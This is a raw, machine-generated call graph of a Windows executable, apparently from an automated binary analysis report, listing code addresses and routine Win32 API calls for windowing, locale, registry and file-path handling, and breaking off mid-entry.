LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53315->53316 53316->53315 53317->53258 53319 40ebf0 5 API calls 53318->53319 53320 40d956 53319->53320 53320->53283 53320->53284 53321->53297 53322->53299 53323->53262 53324->53299 53325->53280 53326->53299 53327->53299 53328->53279 53329->53299 53330->53299 53332 40d968 5 API calls 53331->53332 53333 40ebfd 53332->53333 53333->53299 53334->53294 53335->53303 53336->53299 53337->53299 53339 40bbca 53338->53339 53341 40bbef 53338->53341 53339->53341 53342 40bc6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53339->53342 53341->53223 53341->53311 53342->53341 53344 40ebf0 5 API calls 53343->53344 53345 40d6b1 53344->53345 53346 40d6c4 53345->53346 53350 40ecf4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53345->53350 53346->53206 53348 40d6bf 53351 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53348->53351 53350->53348 53351->53346 53353 40d94c 5 API calls 53352->53353 53354 40e153 53353->53354 53355 40ebf0 5 API calls 53354->53355 53358 40dd7b 53354->53358 53356 40e160 53355->53356 53356->53358 53363 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53356->53363 53358->53236 53364 40ad64 19 API calls 53359->53364 53361 40dbe8 53361->53246 53362->53246 53363->53358 53364->53361 53680 413634 SetWindowLongA GetWindowLongA 53681 413691 SetPropA SetPropA 53680->53681 53682 413673 GetWindowLongA 53680->53682 53687 41f394 53681->53687 53682->53681 53683 413682 SetWindowLongA 53682->53683 53683->53681 53692 423c04 53687->53692 53786 423a7c 53687->53786 53793 415268 53687->53793 53688 4136e1 53697 423c3a 53692->53697 53695 423ce4 53698 423ceb 53695->53698 53699 423d1f 53695->53699 53696 423c85 53700 423c8b 53696->53700 53701 423d48 53696->53701 53713 423c5b 53697->53713 53800 423b60 53697->53800 53702 423cf1 53698->53702 53737 423fa9 53698->53737 53705 424092 IsIconic 53699->53705 53706 423d2a 53699->53706 53703 423c90 53700->53703 53704 423cbd 53700->53704 53707 423d63 53701->53707 53708 423d5a 53701->53708 53710 423f0b SendMessageA 53702->53710 53711 423cff 53702->53711 53714 423c96 53703->53714 53715 423dee 53703->53715 53704->53713 53735 423cd6 53704->53735 53736 423e37 53704->53736 53712 4240a6 GetFocus 53705->53712 53705->53713 53716 423d33 53706->53716 53717 4240ce 53706->53717 53815 42418c 11 API calls 53707->53815 53718 423d70 53708->53718 53719 423d61 53708->53719 53710->53713 53711->53713 53739 423cb8 53711->53739 53766 423f4e 53711->53766 53712->53713 53723 4240b7 53712->53723 53713->53688 53724 423e16 PostMessageA 53714->53724 53725 423c9f 53714->53725 53828 423b7c NtdllDefWindowProc_A 53715->53828 53721 4240e5 53716->53721 53716->53739 53846 424848 WinHelpA PostMessageA 53717->53846 53816 4241d4 IsIconic 53718->53816 53824 423b7c NtdllDefWindowProc_A 53719->53824 53733 424103 53721->53733 53734 4240ee 53721->53734 53845 41efec GetCurrentThreadId 73A25940 53723->53845 53834 423b7c NtdllDefWindowProc_A 53724->53834 53730 423ca8 53725->53730 53731 423e9d 53725->53731 53743 423cb1 53730->53743 53744 423dc6 IsIconic 53730->53744 53745 423ea6 53731->53745 53746 423ed7 53731->53746 53732 423e31 53732->53713 53853 424524 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 53733->53853 53847 4244cc 53734->53847 53738 423e03 53735->53738 53735->53739 53804 423b7c NtdllDefWindowProc_A 53736->53804 53737->53713 53757 423fcf IsWindowEnabled 53737->53757 53829 424170 53738->53829 53739->53713 53814 423b7c NtdllDefWindowProc_A 53739->53814 53742 4240be 53742->53713 53754 4240c6 SetFocus 53742->53754 53743->53739 53755 423d89 53743->53755 53748 423de2 53744->53748 53749 423dd6 53744->53749 53756 423b0c 5 API calls 53745->53756 53811 423b7c NtdllDefWindowProc_A 53746->53811 53827 423b7c NtdllDefWindowProc_A 53748->53827 53826 423bb8 15 API calls 53749->53826 53753 423e3d 53761 423e7b 53753->53761 53762 423e59 53753->53762 53754->53713 53755->53713 53825 422c44 ShowWindow PostMessageA PostQuitMessage 53755->53825 53763 423eae 53756->53763 53757->53713 53764 423fdd 53757->53764 53760 423edd 53765 423ef5 53760->53765 53812 41ee9c GetCurrentThreadId 73A25940 53760->53812 53768 423a7c 6 API calls 53761->53768 53805 423b0c 53762->53805 53770 423ec0 53763->53770 53835 41ef50 53763->53835 53778 423fe4 IsWindowVisible 53764->53778 53774 423a7c 6 API calls 53765->53774 53766->53713 53775 423f70 IsWindowEnabled 53766->53775 53777 423e83 PostMessageA 53768->53777 53841 423b7c NtdllDefWindowProc_A 53770->53841 53774->53713 53775->53713 53779 423f7e 53775->53779 53777->53713 53778->53713 53780 423ff2 GetFocus 53778->53780 53842 412308 7 API calls 53779->53842 53782 4181d8 53780->53782 53783 424007 SetFocus 53782->53783 53843 415238 53783->53843 53787 423b05 53786->53787 53788 423a8c 53786->53788 53787->53688 53788->53787 53789 423a92 EnumWindows 53788->53789 53789->53787 53790 423aae GetWindow GetWindowLongA 53789->53790 53945 423a14 GetWindow 53789->53945 53791 423acd 53790->53791 53791->53787 53792 423af9 SetWindowPos 53791->53792 53792->53787 53792->53791 53794 415275 53793->53794 53795 4152d0 53794->53795 53796 4152db 53794->53796 53799 4152d9 53794->53799 53795->53799 53949 415054 46 API calls 53795->53949 53948 424b84 13 API calls 53796->53948 53799->53688 53801 423b75 53800->53801 53802 423b6a 53800->53802 53801->53695 53801->53696 53802->53801 53854 408710 GetSystemDefaultLCID 53802->53854 53804->53753 53806 423b5a PostMessageA 53805->53806 53808 423b1b 53805->53808 53806->53713 53807 423b52 53917 40b3c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53807->53917 53808->53806 53808->53807 53810 423b46 SetWindowPos 53808->53810 53810->53807 53810->53808 53811->53760 53813 41ef21 53812->53813 53813->53765 53814->53713 53815->53713 53817 42421b 53816->53817 53818 4241e5 SetActiveWindow 53816->53818 53817->53713 53918 423644 53818->53918 53821 423b0c 5 API calls 53822 424202 53821->53822 53822->53817 53823 424215 SetFocus 53822->53823 53823->53817 53824->53713 53825->53713 53826->53713 53827->53713 53828->53713 53930 41db28 53829->53930 53832 424188 53832->53713 53833 42417c LoadIconA 53833->53832 53834->53732 53836 41ef84 53835->53836 53837 41ef58 IsWindow 53835->53837 53836->53770 53838 41ef72 53837->53838 53839 41ef67 EnableWindow 53837->53839 53838->53836 53838->53837 53840 402660 4 API calls 53838->53840 53839->53838 53840->53838 53841->53713 53842->53713 53844 415253 SetFocus 53843->53844 53844->53713 53845->53742 53846->53732 53848 4244f2 53847->53848 53849 4244d8 53847->53849 53852 402648 4 API calls 53848->53852 53850 424507 53849->53850 53851 4244df SendMessageA 53849->53851 53850->53713 53851->53850 53852->53850 53853->53732 53909 408558 GetLocaleInfoA 53854->53909 53857 403450 4 API calls 53858 408750 53857->53858 53859 408558 5 API calls 53858->53859 53860 408765 53859->53860 53861 408558 5 API calls 53860->53861 53862 408789 53861->53862 53915 4085a4 GetLocaleInfoA 53862->53915 53865 4085a4 GetLocaleInfoA 53866 4087b9 53865->53866 53867 408558 5 API calls 53866->53867 53868 4087d3 53867->53868 53869 4085a4 GetLocaleInfoA 53868->53869 53870 4087f0 53869->53870 53871 408558 5 API calls 53870->53871 53872 40880a 53871->53872 53873 403450 4 API calls 53872->53873 53874 408817 53873->53874 53875 408558 5 API calls 53874->53875 53876 40882c 53875->53876 53877 403450 4 API calls 53876->53877 53878 408839 53877->53878 53879 4085a4 GetLocaleInfoA 53878->53879 53880 408847 53879->53880 53881 408558 5 API calls 53880->53881 53882 408861 53881->53882 53883 403450 4 API calls 53882->53883 53884 40886e 53883->53884 53885 408558 5 API calls 53884->53885 53886 408883 53885->53886 53887 403450 4 API calls 53886->53887 53888 408890 53887->53888 53889 408558 5 API calls 53888->53889 53890 4088a5 53889->53890 53891 4088c2 53890->53891 53892 4088b3 53890->53892 53894 403494 4 API calls 53891->53894 53893 403494 4 API calls 53892->53893 53895 4088c0 53893->53895 53894->53895 53896 408558 5 API calls 53895->53896 53897 4088e4 53896->53897 53898 408901 53897->53898 53899 4088f2 53897->53899 53910 408591 53909->53910 53911 40857f 53909->53911 53913 403494 4 API calls 53910->53913 53912 4034e0 4 API calls 53911->53912 53914 40858f 53912->53914 53913->53914 53914->53857 53916 4085c0 53915->53916 53916->53865 53917->53806 53926 4235f0 SystemParametersInfoA 53918->53926 53921 42365d ShowWindow 53923 423668 53921->53923 53924 42366f 53921->53924 53929 423620 SystemParametersInfoA 53923->53929 53924->53821 53927 42360e 53926->53927 53927->53921 53928 423620 SystemParametersInfoA 53927->53928 53928->53921 53929->53924 53933 41db4c 53930->53933 53934 41db32 53933->53934 53935 41db59 53933->53935 53934->53832 53934->53833 53935->53934 53942 40cc68 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53935->53942 53937 41db76 53937->53934 53938 41db90 53937->53938 53939 41db83 53937->53939 53943 41bd84 11 API calls 53938->53943 53944 41b380 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53939->53944 53942->53937 53943->53934 53944->53934 53946 423a35 GetWindowLongA 53945->53946 53947 423a41 53945->53947 53946->53947 53948->53799 53949->53799 53950 46b930 53951 46b964 53950->53951 53984 46bdcd 53950->53984 53953 46b9a0 53951->53953 53956 46b9fc 53951->53956 53957 46b9da 53951->53957 53958 46b9eb 53951->53958 53959 46b9b8 53951->53959 53960 46b9c9 53951->53960 53952 403400 4 API calls 53955 46be0c 53952->53955 53953->53984 54041 468a9c 53953->54041 53961 403400 4 API calls 53955->53961 54273 46b8c0 45 API calls 53956->54273 54006 46b4f0 53957->54006 54272 46b6b0 67 API calls 53958->54272 54270 46b240 47 API calls 53959->54270 54271 46b3a8 42 API calls 53960->54271 53967 46be14 53961->53967 53968 46b9be 53968->53953 53968->53984 53969 46ba38 53970 4942ac 18 API calls 53969->53970 53981 46ba7b 53969->53981 53969->53984 53970->53981 53972 414ae0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53972->53981 53973 46bb9e 54274 482b48 123 API calls 53973->54274 53976 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53976->53981 53977 42cbb8 6 API calls 53977->53981 53978 46bbb9 53978->53984 53979 46bbf7 54059 469d44 53979->54059 53980 46ad88 23 API calls 53980->53981 53981->53972 53981->53973 53981->53976 53981->53977 53981->53979 53981->53980 53981->53984 54002 46bcbf 53981->54002 54044 4689d8 53981->54044 54052 46aaf4 53981->54052 54197 482648 53981->54197 54283 46affc 19 API calls 53981->54283 53984->53952 53985 46ad88 23 API calls 53985->53984 53987 46bc5d 53988 403450 4 API calls 53987->53988 53989 46bc6d 53988->53989 53990 46bcc9 53989->53990 53991 46bc79 53989->53991 53996 46bd8b 53990->53996 54120 46ad88 53990->54120 53992 457d3c 24 API calls 53991->53992 53993 46bc98 53992->53993 53995 457d3c 24 API calls 53993->53995 53995->54002 53997 46bce3 54002->53985 54284 46c244 54006->54284 54009 46b672 54010 403420 4 API calls 54009->54010 54013 46b68c 54010->54013 54011 414ae0 4 API calls 54012 46b53e 54011->54012 54014 46b65e 54012->54014 54287 455f58 13 API calls 54012->54287 54015 403400 4 API calls 54013->54015 54014->54009 54017 403450 4 API calls 54014->54017 54018 46b694 54015->54018 54017->54009 54019 403400 4 API calls 54018->54019 54020 46b69c 54019->54020 54020->53953 54021 46b621 54021->54009 54021->54014 54027 42cd40 7 API calls 54021->54027 54022 42cd40 7 API calls 54024 46b5fa 54022->54024 54023 46b5c1 54023->54009 54023->54021 54023->54022 54024->54021 54029 45142c 4 API calls 54024->54029 54025 46b55c 54025->54023 54288 466428 54025->54288 54028 46b637 54027->54028 54028->54014 54033 45142c 4 API calls 54028->54033 54031 46b611 54029->54031 54293 47e618 42 API calls 54031->54293 54032 466428 19 API calls 54035 46b59c 54032->54035 54036 46b64e 54033->54036 54037 4513fc 4 API calls 54035->54037 54294 47e618 42 API calls 54036->54294 54039 46b5b1 54037->54039 54292 47e618 42 API calls 54039->54292 54042 4689d8 19 API calls 54041->54042 54043 468aab 54042->54043 54043->53969 54047 468a07 54044->54047 54045 4078e4 19 API calls 54046 468a40 54045->54046 54415 453318 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54046->54415 54047->54045 54049 468a48 54047->54049 54050 403400 4 API calls 54049->54050 54051 468a60 54050->54051 54051->53981 54053 46ab05 54052->54053 54054 46ab00 54052->54054 54501 4698a8 46 API calls 54053->54501 54058 46ab03 54054->54058 54416 46a560 54054->54416 54056 46ab0d 54056->53981 54058->53981 54060 403400 4 API calls 54059->54060 54061 469d72 54060->54061 54524 47d4e4 54061->54524 54063 469dd5 54064 469df2 54063->54064 54065 469dd9 54063->54065 54067 469de3 54064->54067 54534 49419c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54064->54534 54531 466628 54065->54531 54070 469f11 54067->54070 54071 469f7c 54067->54071 54119 46a086 54067->54119 54069 469e0e 54069->54067 54073 469e16 54069->54073 54074 403494 4 API calls 54070->54074 54075 403494 4 API calls 54071->54075 54072 403420 4 API calls 54076 46a0b0 54072->54076 54077 46ad88 23 API calls 54073->54077 54078 469f1e 54074->54078 54079 469f89 54075->54079 54076->53987 54080 469e23 54077->54080 54081 40357c 4 API calls 54078->54081 54082 40357c 4 API calls 54079->54082 54093 469e64 54080->54093 54094 469e4c SetActiveWindow 54080->54094 54083 469f2b 54081->54083 54084 469f96 54082->54084 54085 40357c 4 API calls 54083->54085 54086 40357c 4 API calls 54084->54086 54087 469f38 54085->54087 54088 469fa3 54086->54088 54090 40357c 4 API calls 54087->54090 54089 40357c 4 API calls 54088->54089 54092 469fb0 54089->54092 54091 469f45 54090->54091 54095 466628 20 API calls 54091->54095 54096 40357c 4 API calls 54092->54096 54535 42f558 54093->54535 54094->54093 54097 469f53 54095->54097 54098 469fbe 54096->54098 54099 40357c 4 API calls 54097->54099 54100 414b10 4 API calls 54098->54100 54102 469f5c 54099->54102 54103 469f7a 54100->54103 54106 40357c 4 API calls 54102->54106 54552 466960 54103->54552 54109 469f69 54106->54109 54108 469eb5 54111 46ac04 21 API calls 54108->54111 54110 414b10 4 API calls 54109->54110 54110->54103 54112 469ee7 54111->54112 54112->53987 54113 469fe0 54114 414b10 4 API calls 54113->54114 54113->54119 54115 46a043 54114->54115 54555 49505c MulDiv 54115->54555 54117 46a060 54118 414b10 4 API calls 54117->54118 54118->54119 54119->54072 54121 468a9c 19 API calls 54120->54121 54122 46ada0 54121->54122 54123 46adc2 54122->54123 54124 4650f4 7 API calls 54122->54124 54641 4650f4 54123->54641 54124->54123 54128 46adda 54129 46ac04 21 API calls 54128->54129 54130 46ae12 54129->54130 54131 414b10 4 API calls 54130->54131 54132 46ae26 54131->54132 54133 46ae32 54132->54133 54134 46ae5c 54132->54134 54135 414b10 4 API calls 54133->54135 54137 46ae7b 54134->54137 54138 46aea5 54134->54138 54136 46ae46 54135->54136 54140 414b10 4 API calls 54136->54140 54141 414b10 4 API calls 54137->54141 54139 414b10 4 API calls 54138->54139 54142 46aeb9 54139->54142 54143 46ae5a 54140->54143 54144 46ae8f 54141->54144 54145 414b10 4 API calls 54142->54145 54658 46ab1c 54143->54658 54146 414b10 4 API calls 54144->54146 54145->54143 54146->54143 54150 468a9c 19 API calls 54152 46af57 54150->54152 54151 46aef7 54151->54150 54153 46afba 54152->54153 54663 4941f8 18 API calls 54152->54663 54153->53997 54198 46c244 48 API calls 54197->54198 54199 48268b 54198->54199 54200 482694 54199->54200 54900 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54199->54900 54202 414ae0 4 API calls 54200->54202 54203 4826a4 54202->54203 54204 403450 4 API calls 54203->54204 54205 4826b1 54204->54205 54710 46c59c 54205->54710 54208 4826c1 54210 414ae0 4 API calls 54208->54210 54211 4826d1 54210->54211 54212 403450 4 API calls 54211->54212 54213 4826de 54212->54213 54214 469690 SendMessageA 54213->54214 54215 4826f7 54214->54215 54216 482748 54215->54216 54902 4797dc 23 API calls 54215->54902 54218 4241d4 11 API calls 54216->54218 54219 482752 54218->54219 54220 482778 54219->54220 54221 482763 SetActiveWindow 54219->54221 54739 481a78 54220->54739 54221->54220 54270->53968 54271->53953 54272->53953 54273->53953 54274->53978 54283->53981 54295 46c2dc 54284->54295 54287->54025 54289 466442 54288->54289 54290 4078e4 19 API calls 54289->54290 54291 46647d 54290->54291 54291->54032 54292->54023 54293->54021 54294->54014 54296 414ae0 4 API calls 54295->54296 54297 46c310 54296->54297 54356 4666c0 54297->54356 54301 46c322 54302 46c331 54301->54302 54306 46c34a 54301->54306 54391 47e618 42 API calls 54302->54391 54304 403420 4 API calls 54305 46b522 54304->54305 54305->54009 54305->54011 54307 46c391 54306->54307 54308 46c378 54306->54308 54309 46c3f6 54307->54309 54314 46c395 54307->54314 54392 47e618 42 API calls 54308->54392 54394 42cb44 CharNextA 54309->54394 54312 46c405 54313 46c409 54312->54313 54318 46c422 54312->54318 54395 47e618 42 API calls 54313->54395 54316 46c3dd 54314->54316 54314->54318 54393 47e618 42 API calls 54316->54393 54317 46c446 54396 47e618 42 API calls 54317->54396 54318->54317 54370 466830 54318->54370 54322 46c436 54322->54317 54375 466860 54322->54375 54323 46c345 54323->54304 54326 46c45f 54327 403778 4 API calls 54326->54327 54328 46c475 54327->54328 54379 42c994 54328->54379 54331 46c486 54397 4668bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54331->54397 54332 46c4b7 54334 42c8c4 5 API calls 54332->54334 54336 46c4c2 54334->54336 54335 46c499 54337 45142c 4 API calls 54335->54337 54338 42c3f4 5 API calls 54336->54338 54339 46c4a6 54337->54339 54340 46c4cd 54338->54340 54398 47e618 42 API calls 54339->54398 54342 42cbb8 6 API calls 54340->54342 54343 46c4d8 54342->54343 54383 46c270 54343->54383 54345 46c4e0 54346 42cd40 7 API calls 54345->54346 54347 46c4e8 54346->54347 54348 46c502 54347->54348 54349 46c4ec 54347->54349 54348->54323 54351 46c50c 54348->54351 54399 47e618 42 API calls 54349->54399 54352 46c514 GetDriveTypeA 54351->54352 54352->54323 54353 46c51f 54352->54353 54400 47e618 42 API calls 54353->54400 54359 4666da 54356->54359 54358 42cbb8 6 API calls 54358->54359 54359->54358 54360 403450 4 API calls 54359->54360 54361 406ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54359->54361 54362 466723 54359->54362 54401 42caa4 54359->54401 54360->54359 54361->54359 54363 403420 4 API calls 54362->54363 54364 46673d 54363->54364 54365 414b10 54364->54365 54366 414ae0 4 API calls 54365->54366 54367 414b34 54366->54367 54368 403400 4 API calls 54367->54368 54369 414b65 54368->54369 54369->54301 54373 46683a 54370->54373 54371 46685b 54371->54322 54372 46684d 54372->54322 54373->54371 54373->54372 54412 42cb34 CharNextA 54373->54412 54376 46686a 54375->54376 54377 466897 54376->54377 54413 42cb34 CharNextA 54376->54413 54377->54317 54377->54326 54380 42c9ed 54379->54380 54381 42c9aa 54379->54381 54380->54331 54380->54332 54381->54380 54414 42cb34 CharNextA 54381->54414 54384 46c2d5 54383->54384 54385 46c283 54383->54385 54384->54345 54385->54384 54386 41ee9c 2 API calls 54385->54386 54387 46c293 54386->54387 54388 46c2ad SHPathPrepareForWriteA 54387->54388 54389 41ef50 6 API calls 54388->54389 54390 46c2cd 54389->54390 54390->54345 54391->54323 54392->54323 54393->54323 54394->54312 54395->54323 54396->54323 54397->54335 54398->54323 54399->54323 54402 403494 4 API calls 54401->54402 54405 42cab4 54402->54405 54403 403744 4 API calls 54403->54405 54405->54403 54407 42caea 54405->54407 54410 42c43c IsDBCSLeadByte 54405->54410 54406 42cb2e 54406->54359 54407->54406 54409 4037b8 4 API calls 54407->54409 54411 42c43c IsDBCSLeadByte 54407->54411 54409->54407 54410->54405 54411->54407 54412->54373 54413->54376 54414->54381 54415->54049 54418 46a5a7 54416->54418 54417 46aa1f 54420 46aa3a 54417->54420 54421 46aa6b 54417->54421 54418->54417 54419 46a662 54418->54419 54423 403494 4 API calls 54418->54423 54422 46a683 54419->54422 54427 46a6c4 54419->54427 54424 403494 4 API calls 54420->54424 54425 403494 4 API calls 54421->54425 54428 403494 4 API calls 54422->54428 54429 46a5e6 54423->54429 54430 46aa48 54424->54430 54426 46aa79 54425->54426 54520 468f84 12 API calls 54426->54520 54435 403400 4 API calls 54427->54435 54432 46a691 54428->54432 54433 414ae0 4 API calls 54429->54433 54519 468f84 12 API calls 54430->54519 54436 414ae0 4 API calls 54432->54436 54437 46a607 54433->54437 54450 46a6c2 54435->54450 54439 46a6b2 54436->54439 54440 403634 4 API calls 54437->54440 54438 403400 4 API calls 54443 46aa9c 54438->54443 54445 403634 4 API calls 54439->54445 54446 46a617 54440->54446 54441 46aa56 54441->54438 54449 403400 4 API calls 54443->54449 54444 46a830 54447 403400 4 API calls 54444->54447 54445->54450 54451 414ae0 4 API calls 54446->54451 54452 46a82e 54447->54452 54448 46a6e4 54453 46a722 54448->54453 54454 46a6ea 54448->54454 54455 46aaa4 54449->54455 54496 46a7a8 54450->54496 54502 469690 54450->54502 54456 46a62b 54451->54456 54514 469acc 43 API calls 54452->54514 54459 403400 4 API calls 54453->54459 54457 403494 4 API calls 54454->54457 54458 403420 4 API calls 54455->54458 54456->54419 54460 414ae0 4 API calls 54456->54460 54461 46a6f8 54457->54461 54462 46aab1 54458->54462 54464 46a720 54459->54464 54465 46a652 54460->54465 54467 47bb50 43 API calls 54461->54467 54462->54058 54463 46a7ef 54468 403494 4 API calls 54463->54468 54508 469984 54464->54508 54469 403634 4 API calls 54465->54469 54471 46a710 54467->54471 54472 46a7fd 54468->54472 54469->54419 54470 46a859 54478 46a864 54470->54478 54479 46a8ba 54470->54479 54474 403634 4 API calls 54471->54474 54475 414ae0 4 API calls 54472->54475 54474->54464 54477 46a81e 54475->54477 54476 46a749 54483 46a754 54476->54483 54484 46a7aa 54476->54484 54480 403634 4 API calls 54477->54480 54482 403494 4 API calls 54478->54482 54481 403400 4 API calls 54479->54481 54480->54452 54487 46a8c2 54481->54487 54488 46a872 54482->54488 54486 403494 4 API calls 54483->54486 54485 403400 4 API calls 54484->54485 54485->54496 54491 46a762 54486->54491 54500 46a96b 54487->54500 54515 49419c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54487->54515 54488->54487 54492 403634 4 API calls 54488->54492 54494 46a8b8 54488->54494 54490 46a8e5 54490->54500 54516 494448 18 API calls 54490->54516 54495 403634 4 API calls 54491->54495 54491->54496 54492->54488 54494->54487 54495->54491 54496->54444 54496->54463 54498 46aa0c 54518 42913c SendMessageA SendMessageA 54498->54518 54517 4290ec SendMessageA 54500->54517 54501->54056 54521 42a038 SendMessageA 54502->54521 54504 46969f 54505 4696bf 54504->54505 54522 42a038 SendMessageA 54504->54522 54505->54448 54507 4696af 54507->54448 54511 4699b1 54508->54511 54509 469a13 54510 403400 4 API calls 54509->54510 54512 469a28 54510->54512 54511->54509 54523 469908 43 API calls 54511->54523 54512->54476 54514->54470 54515->54490 54516->54500 54517->54498 54518->54417 54519->54441 54520->54441 54521->54504 54522->54507 54523->54511 54525 47d4fd 54524->54525 54529 47d53a 54524->54529 54556 455ce0 54525->54556 54529->54063 54530 47d551 54530->54063 54611 46653c 54531->54611 54534->54069 54536 42f564 54535->54536 54537 42f587 GetActiveWindow GetFocus 54536->54537 54538 41ee9c 2 API calls 54537->54538 54539 42f59e 54538->54539 54540 42f5bb 54539->54540 54541 42f5ab RegisterClassA 54539->54541 54542 42f64a SetFocus 54540->54542 54543 42f5c9 CreateWindowExA 54540->54543 54541->54540 54545 403400 4 API calls 54542->54545 54543->54542 54544 42f5fc 54543->54544 54632 424274 54544->54632 54547 42f666 54545->54547 54551 494448 18 API calls 54547->54551 54548 42f624 54549 42f62c CreateWindowExA 54548->54549 54549->54542 54550 42f642 ShowWindow 54549->54550 54550->54542 54551->54108 54638 44b50c 54552->54638 54554 466967 54554->54113 54555->54117 54557 455cf1 54556->54557 54558 455cf5 54557->54558 54559 455cfe 54557->54559 54582 4559e4 54558->54582 54590 455ac4 29 API calls 54559->54590 54562 455cfb 54562->54529 54563 47d154 54562->54563 54565 47d194 54563->54565 54569 47d250 54563->54569 54564 403420 4 API calls 54566 47d333 54564->54566 54565->54569 54570 479368 4 API calls 54565->54570 54574 47bb50 43 API calls 54565->54574 54578 47d1f3 54565->54578 54580 47d1fc 54565->54580 54599 479204 54565->54599 54566->54530 54567 4790c4 19 API calls 54567->54569 54569->54567 54575 47d2a1 54569->54575 54569->54578 54570->54565 54571 47bb50 43 API calls 54571->54575 54572 47bb50 43 API calls 54572->54580 54573 4540d4 20 API calls 54573->54575 54574->54565 54575->54569 54575->54571 54575->54573 54577 47d23d 54575->54577 54576 42c924 5 API calls 54576->54580 54577->54578 54578->54564 54579 42c94c 5 API calls 54579->54580 54580->54565 54580->54572 54580->54576 54580->54577 54580->54579 54610 47ce60 52 API calls 54580->54610 54583 42de14 RegOpenKeyExA 54582->54583 54584 455a01 54583->54584 54585 455a4f 54584->54585 54591 455918 54584->54591 54585->54562 54588 455918 6 API calls 54589 455a30 RegCloseKey 54588->54589 54589->54562 54590->54562 54596 42dd50 54591->54596 54593 403420 4 API calls 54594 4559ca 54593->54594 54594->54588 54595 455940 54595->54593 54597 42dbf8 6 API calls 54596->54597 54598 42dd59 54597->54598 54598->54595 54600 479216 54599->54600 54601 47921a 54599->54601 54600->54565 54602 403450 4 API calls 54601->54602 54603 479227 54602->54603 54604 479247 54603->54604 54605 47922d 54603->54605 54607 4790c4 19 API calls 54604->54607 54606 4790c4 19 API calls 54605->54606 54608 479243 54606->54608 54607->54608 54609 403400 4 API calls 54608->54609 54609->54600 54610->54580 54612 403494 4 API calls 54611->54612 54613 46656a 54612->54613 54614 42dbc0 5 API calls 54613->54614 54615 46657c 54614->54615 54616 42dbc0 5 API calls 54615->54616 54617 46658e 54616->54617 54618 466428 19 API calls 54617->54618 54619 466598 54618->54619 54620 42dbc0 5 API calls 54619->54620 54621 4665a7 54620->54621 54628 4664a0 54621->54628 54624 42dbc0 5 API calls 54625 4665c0 54624->54625 54626 403400 4 API calls 54625->54626 54627 4665d5 54626->54627 54627->54067 54629 4664c0 54628->54629 54630 4078e4 19 API calls 54629->54630 54631 46650a 54630->54631 54631->54624 54633 4242a6 54632->54633 54634 424286 GetWindowTextA 54632->54634 54636 403494 4 API calls 54633->54636 54635 4034e0 4 API calls 54634->54635 54637 4242a4 54635->54637 54636->54637 54637->54548 54639 44b384 11 API calls 54638->54639 54640 44b51f 54639->54640 54640->54554 54643 4650ff 54641->54643 54642 4651da 54652 466eb4 54642->54652 54643->54642 54647 46514f 54643->54647 54664 421a14 54643->54664 54644 465192 54644->54642 54670 4185b0 7 API calls 54644->54670 54647->54644 54648 465194 54647->54648 54649 465189 54647->54649 54651 421a14 7 API calls 54648->54651 54650 421a14 7 API calls 54649->54650 54650->54644 54651->54644 54653 466ee4 54652->54653 54654 466ec5 54652->54654 54653->54128 54655 414b10 4 API calls 54654->54655 54656 466ed3 54655->54656 54657 414b10 4 API calls 54656->54657 54657->54653 54659 46ab29 54658->54659 54660 421a14 7 API calls 54659->54660 54661 46abb4 54660->54661 54661->54151 54662 466988 18 API calls 54661->54662 54662->54151 54663->54153 54665 421a6c 54664->54665 54668 421a22 54664->54668 54665->54647 54666 421a51 54666->54665 54671 421d20 SetFocus GetFocus 54666->54671 54668->54666 54669 408cac 5 API calls 54668->54669 54669->54666 54670->54642 54671->54665 54711 46c5c5 54710->54711 54712 46c612 54711->54712 54713 414ae0 4 API calls 54711->54713 54715 403420 4 API calls 54712->54715 54714 46c5db 54713->54714 54909 46674c 6 API calls 54714->54909 54717 46c6bc 54715->54717 54717->54208 54901 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54717->54901 54718 46c5e3 54719 414b10 4 API calls 54718->54719 54720 46c5f1 54719->54720 54721 46c5fe 54720->54721 54723 46c617 54720->54723 54910 47e618 42 API calls 54721->54910 54724 46c62f 54723->54724 54725 466830 CharNextA 54723->54725 54911 47e618 42 API calls 54724->54911 54727 46c62b 54725->54727 54727->54724 54728 46c645 54727->54728 54729 46c661 54728->54729 54730 46c64b 54728->54730 54732 42c994 CharNextA 54729->54732 54912 47e618 42 API calls 54730->54912 54733 46c66e 54732->54733 54733->54712 54913 4668bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54733->54913 54735 46c685 54736 45142c 4 API calls 54735->54736 54737 46c692 54736->54737 54914 47e618 42 API calls 54737->54914 54740 481ac9 54739->54740 54741 481a9b 54739->54741 54743 475934 54740->54743 54915 4941f8 18 API calls 54741->54915 54744 457b30 24 API calls 54743->54744 54745 475980 54744->54745 54746 407298 SetCurrentDirectoryA 54745->54746 54747 47598a 54746->54747 54916 46e128 54747->54916 54751 47599a 54924 459f68 54751->54924 54902->54216 54909->54718 54910->54712 54911->54712 54912->54712 54913->54735 54914->54712 54915->54740 54917 46e19b 54916->54917 54919 46e145 54916->54919 54920 46e1a0 54917->54920 54918 479204 19 API calls 54918->54919 54919->54917 54919->54918 54921 46e1c6 54920->54921 55364 44faf0 54921->55364 54923 46e222 54923->54751 54925 459f6e 54924->54925 54926 45a250 4 API calls 54925->54926 55367 44fb04 55364->55367 55368 44fb15 55367->55368 55369 44fb01 55368->55369 55370 44fb3f MulDiv 55368->55370 55369->54923 55371 4181d8 55370->55371 55372 44fb6a SendMessageA 55371->55372 55372->55369 53365 42f518 53366 42f523 53365->53366 53367 42f527 NtdllDefWindowProc_A 53365->53367 53367->53366 53368 4358d8 53369 4358ed 53368->53369 53373 435907 53369->53373 53374 